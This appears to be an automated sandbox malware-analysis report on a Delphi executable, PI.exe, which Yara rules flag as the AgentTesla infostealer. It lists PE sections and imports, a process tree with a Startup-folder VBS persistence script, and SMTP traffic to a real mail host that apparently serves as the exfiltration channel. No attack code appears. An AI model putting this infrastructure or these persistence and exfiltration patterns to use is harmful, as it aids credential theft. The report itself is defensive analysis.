add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x93000	0x2476	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa0000	0x56b38	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x98000	0x78e0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x97000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x74a6c	0x74c00	False	0.527640691916	data	6.51771227621	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
DATA	0x76000	0x1b2a8	0x1b400	False	0.175790209289	data	2.73498209356	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
BSS	0x92000	0xcb1	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x93000	0x2476	0x2600	False	0.350226151316	data	4.84432017187	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls	0x96000	0x10	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0x97000	0x18	0x200	False	0.048828125	data	0.20058190744	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x98000	0x78e0	0x7a00	False	0.565445696721	data	6.61076904488	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0xa0000	0x56b38	0x56c00	False	0.799990431376	data	7.40298144524	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0xa0678	0x1d0	data
RT_BITMAP	0xa0848	0x1e4	data
RT_BITMAP	0xa0a2c	0x1d0	data
RT_BITMAP	0xa0bfc	0x1d0	data
RT_BITMAP	0xa0dcc	0x1d0	data
RT_BITMAP	0xa0f9c	0x1d0	data
RT_BITMAP	0xa116c	0x1d0	data
RT_BITMAP	0xa133c	0x1d0	data
RT_BITMAP	0xa150c	0x46fb8	data	English	United States
RT_BITMAP	0xe84c4	0x1d0	data
RT_BITMAP	0xe8694	0xd8	data
RT_BITMAP	0xe876c	0xd8	data
RT_BITMAP	0xe8844	0xd8	data
RT_BITMAP	0xe891c	0xd8	data
RT_BITMAP	0xe89f4	0xd8	data
RT_BITMAP	0xe8acc	0xe8	GLS_BINARY_LSB_FIRST
RT_ICON	0xe8bb4	0xd228	data
RT_ICON	0xf5ddc	0x1e8	data	English	United States
RT_DIALOG	0xf5fc4	0x52	data
RT_RCDATA	0xf6018	0x10	data
RT_RCDATA	0xf6028	0x274	data
RT_RCDATA	0xf629c	0x6ca	Delphi compiled form 'TForm1'
RT_GROUP_ICON	0xf6968	0x14	data	English	United States
RT_GROUP_ICON	0xf697c	0x14	data
RT_HTML	0xf6990	0x1a5	data	English	United States

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll	lstrcpyA, lstrcmpA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtectEx, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemTime, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PolyPolyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExtCreatePen, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll	WindowFromPoint, WinHelpA, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassA, UnionRect, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetNextDlgTabItem, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreateWindowExA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayRedim, SafeArrayCreate, VariantChangeTypeEx, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
kernel32.dll	MulDiv

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2020 09:23:09.924571037 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:10.028354883 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:10.028501987 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:10.266788960 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:10.267379999 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:10.371258020 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:10.375641108 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:10.480600119 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:10.529444933 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:10.605269909 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:10.714890003 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:10.714910984 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:10.714929104 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:10.715009928 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:10.722001076 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:10.825871944 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:10.873198986 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:10.900733948 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:11.004554987 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:11.005378962 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:11.109406948 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:11.110090017 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:11.214315891 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:11.214966059 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:11.318675041 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:11.319313049 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:11.423187971 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:11.424026966 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:11.527724028 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:11.529405117 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:11.529438972 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:11.529639006 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:11.529697895 CET	49745	587	192.168.2.4	66.70.204.222
Nov 21, 2020 09:23:11.633145094 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:11.633163929 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:11.633178949 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:11.633196115 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:11.635540009 CET	587	49745	66.70.204.222	192.168.2.4
Nov 21, 2020 09:23:11.685883999 CET	49745	587	192.168.2.4	66.70.204.222

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2020 09:22:29.665887117 CET	55854	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:22:29.701451063 CET	53	55854	8.8.8.8	192.168.2.4
Nov 21, 2020 09:22:30.782808065 CET	64549	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:22:30.820704937 CET	53	64549	8.8.8.8	192.168.2.4
Nov 21, 2020 09:22:31.618479013 CET	63153	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:22:31.658363104 CET	53	63153	8.8.8.8	192.168.2.4
Nov 21, 2020 09:22:33.606868029 CET	52991	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:22:33.633958101 CET	53	52991	8.8.8.8	192.168.2.4
Nov 21, 2020 09:22:34.454566956 CET	53700	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:22:34.481839895 CET	53	53700	8.8.8.8	192.168.2.4
Nov 21, 2020 09:22:36.034655094 CET	51726	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:22:36.061861992 CET	53	51726	8.8.8.8	192.168.2.4
Nov 21, 2020 09:22:36.859998941 CET	56794	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:22:36.887221098 CET	53	56794	8.8.8.8	192.168.2.4
Nov 21, 2020 09:22:37.800707102 CET	56534	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:22:37.827805042 CET	53	56534	8.8.8.8	192.168.2.4
Nov 21, 2020 09:22:38.591844082 CET	56627	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:22:38.618913889 CET	53	56627	8.8.8.8	192.168.2.4
Nov 21, 2020 09:22:39.402890921 CET	56621	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:22:39.430139065 CET	53	56621	8.8.8.8	192.168.2.4
Nov 21, 2020 09:22:40.270179033 CET	63116	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:22:40.297343969 CET	53	63116	8.8.8.8	192.168.2.4
Nov 21, 2020 09:22:41.075125933 CET	64078	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:22:41.102283001 CET	53	64078	8.8.8.8	192.168.2.4
Nov 21, 2020 09:22:53.258553982 CET	64801	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:22:53.285664082 CET	53	64801	8.8.8.8	192.168.2.4
Nov 21, 2020 09:23:09.849884033 CET	61721	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:23:09.900660992 CET	53	61721	8.8.8.8	192.168.2.4
Nov 21, 2020 09:23:12.888914108 CET	51255	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:23:12.924585104 CET	53	51255	8.8.8.8	192.168.2.4
Nov 21, 2020 09:23:13.544195890 CET	61522	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:23:13.591140032 CET	53	61522	8.8.8.8	192.168.2.4
Nov 21, 2020 09:23:14.005001068 CET	52337	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:23:14.042680979 CET	53	52337	8.8.8.8	192.168.2.4
Nov 21, 2020 09:23:14.345452070 CET	55046	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:23:14.381134987 CET	53	55046	8.8.8.8	192.168.2.4
Nov 21, 2020 09:23:14.571958065 CET	49612	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:23:14.607553005 CET	53	49612	8.8.8.8	192.168.2.4
Nov 21, 2020 09:23:14.738149881 CET	49285	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:23:14.773812056 CET	53	49285	8.8.8.8	192.168.2.4
Nov 21, 2020 09:23:15.049410105 CET	50601	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:23:15.087235928 CET	53	50601	8.8.8.8	192.168.2.4
Nov 21, 2020 09:23:15.203252077 CET	60875	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:23:15.230339050 CET	53	60875	8.8.8.8	192.168.2.4
Nov 21, 2020 09:23:15.750739098 CET	56448	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:23:15.786406040 CET	53	56448	8.8.8.8	192.168.2.4
Nov 21, 2020 09:23:16.347703934 CET	59172	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:23:16.374716997 CET	53	59172	8.8.8.8	192.168.2.4
Nov 21, 2020 09:23:17.341249943 CET	62420	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:23:17.368442059 CET	53	62420	8.8.8.8	192.168.2.4
Nov 21, 2020 09:23:17.770350933 CET	60579	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:23:17.806009054 CET	53	60579	8.8.8.8	192.168.2.4
Nov 21, 2020 09:23:27.831593037 CET	50183	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:23:27.858556032 CET	53	50183	8.8.8.8	192.168.2.4
Nov 21, 2020 09:23:28.011451960 CET	61531	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:23:28.047419071 CET	53	61531	8.8.8.8	192.168.2.4
Nov 21, 2020 09:23:32.962865114 CET	49228	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:23:32.998584986 CET	53	49228	8.8.8.8	192.168.2.4
Nov 21, 2020 09:24:03.075450897 CET	59794	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:24:03.102566004 CET	53	59794	8.8.8.8	192.168.2.4
Nov 21, 2020 09:24:04.330602884 CET	55916	53	192.168.2.4	8.8.8.8
Nov 21, 2020 09:24:04.366344929 CET	53	55916	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 21, 2020 09:23:09.849884033 CET	192.168.2.4	8.8.8.8	0x605e	Standard query (0)	mail.hybridgroupco.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 21, 2020 09:23:09.900660992 CET	8.8.8.8	192.168.2.4	0x605e	No error (0)	mail.hybridgroupco.com	hybridgroupco.com		CNAME (Canonical name)	IN (0x0001)
Nov 21, 2020 09:23:09.900660992 CET	8.8.8.8	192.168.2.4	0x605e	No error (0)	hybridgroupco.com		66.70.204.222	A (IP address)	IN (0x0001)

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 21, 2020 09:23:10.266788960 CET	587	49745	66.70.204.222	192.168.2.4	220-host.theserver.live ESMTP Exim 4.93 #2 Sat, 21 Nov 2020 12:23:10 +0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 21, 2020 09:23:10.267379999 CET	49745	587	192.168.2.4	66.70.204.222	EHLO 284992
Nov 21, 2020 09:23:10.371258020 CET	587	49745	66.70.204.222	192.168.2.4	250-host.theserver.live Hello 284992 [84.17.52.25] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-STARTTLS 250 HELP
Nov 21, 2020 09:23:10.375641108 CET	49745	587	192.168.2.4	66.70.204.222	STARTTLS
Nov 21, 2020 09:23:10.480600119 CET	587	49745	66.70.204.222	192.168.2.4	220 TLS go ahead

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: PI.exe PID: 6512 Parent PID: 5976

General

Start time:	09:22:30
Start date:	21/11/2020
Path:	C:\Users\user\Desktop\PI.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PI.exe'
Imagebase:	0x400000
File size:	987648 bytes
MD5 hash:	DBDA32339A6965FEFC794F220F944016
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.681442399.00000000027E5000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.681329227.0000000002772000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: notepad.exe PID: 1476 Parent PID: 6512

General

Start time:	09:22:31
Start date:	21/11/2020
Path:	C:\Windows\SysWOW64\notepad.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\notepad.exe
Imagebase:	0xcf0000
File size:	236032 bytes
MD5 hash:	D693F13FE3AA2010B854C4C60671B8E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: PI.exe PID: 5152 Parent PID: 6512

General

Start time:	09:22:31
Start date:	21/11/2020
Path:	C:\Users\user\Desktop\PI.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PI.exe'
Imagebase:	0x400000
File size:	987648 bytes
MD5 hash:	DBDA32339A6965FEFC794F220F944016
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.941812642.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.941872630.0000000000475000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.942359260.0000000002180000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.942468067.0000000002252000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.943139633.0000000002AC1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.943293284.0000000002B8A000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.942414784.00000000021E2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.943432491.0000000002C69000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: PI.exe PID: 4600 Parent PID: 6512

General

Start time:	09:22:32
Start date:	21/11/2020
Path:	C:\Users\user\Desktop\PI.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PI.exe' 2 5152 5197828
Imagebase:	0x400000
File size:	987648 bytes
MD5 hash:	DBDA32339A6965FEFC794F220F944016
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: wscript.exe PID: 6776 Parent PID: 3424

General

Start time:	09:22:41
Start date:	21/11/2020
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STRATUP.vbs'
Imagebase:	0x7ff6a8ea0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: PI.exe PID: 6744 Parent PID: 6776

General

Start time:	09:22:43
Start date:	21/11/2020
Path:	C:\Users\user\Desktop\PI.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PI.exe'
Imagebase:	0x400000
File size:	987648 bytes
MD5 hash:	DBDA32339A6965FEFC794F220F944016
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.708227438.00000000027D5000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: notepad.exe PID: 6636 Parent PID: 6744

General

Start time:	09:22:43
Start date:	21/11/2020
Path:	C:\Windows\SysWOW64\notepad.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\notepad.exe
Imagebase:	0xcf0000
File size:	236032 bytes
MD5 hash:	D693F13FE3AA2010B854C4C60671B8E2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: PI.exe PID: 6728 Parent PID: 6744

General

Start time:	09:22:44
Start date:	21/11/2020
Path:	C:\Users\user\Desktop\PI.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PI.exe'
Imagebase:	0x400000
File size:	987648 bytes
MD5 hash:	DBDA32339A6965FEFC794F220F944016
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.706572619.0000000000B42000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.705557320.0000000000475000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.706213393.0000000000790000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.707115774.0000000000BB2000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000001.705125363.0000000000499000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: PI.exe PID: 6788 Parent PID: 6744

General

Start time:	09:22:44
Start date:	21/11/2020
Path:	C:\Users\user\Desktop\PI.exe
Wow64 process (32bit):	false
